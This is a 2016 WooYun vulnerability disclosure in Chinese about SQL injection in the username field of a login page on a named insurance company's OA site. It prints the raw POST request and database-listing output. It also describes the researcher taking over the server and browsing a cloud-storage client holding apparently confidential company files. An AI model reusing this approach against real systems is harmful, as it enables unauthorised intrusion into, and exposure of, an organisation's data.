当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170048

漏洞标题:长城保险某站漏洞(导致公司大量秘密信息可泄露)

相关厂商:长城人寿保险股份有限公司

漏洞作者: 云袭2001

提交时间:2016-01-15 21:39

修复时间:2016-01-18 08:52

公开时间:2016-01-18 08:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-15: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

和之前的站点漏洞像似,但是不是相同的位置,不是重复的漏洞~~~

详细说明:

http://oa.ccib.com.cn/login.asp 
登陆的页面post注入:

POST /LoginType.asp HTTP/1.1
Host: oa.ccib.com.cn
Content-Length: 70
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://oa.ccib.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) hrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://oa.ccib.com.cn/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ASPSESSIONIDASBSDCBR=DDIJGEODBIEDENPJDPPBLKPM
Digest=&urlFrom=&username=admin&password=admin&submit1=+%B5%C7+%C2%BC+


username 存在注入

长城保险673.png


6个数据库:并没有使用

available databases [6]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


长城保险1561.png


看来可以直接拿下服务器了

长城保险1584.png


长城保险1611.png


可以看到主站也在这台服务器上,so 主站也拿下了

漏洞证明:

数据库里没有什么数据,但是有了意外的发现:
打开我的电脑居然发现有百度云,默认直接就打开了:

122.jpg


其中除了用户个人信息之外,全部都是企业的绝密信息吧

长城保险1691.png


长城保险1694.png


就到此为止了, 并未获取任何数据.

修复方案:

求20rank~~~

版权声明:转载请注明来源 云袭2001@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-18 08:52

厂商回复:

非本公司系统漏洞

最新状态:

暂无


漏洞评价:

评价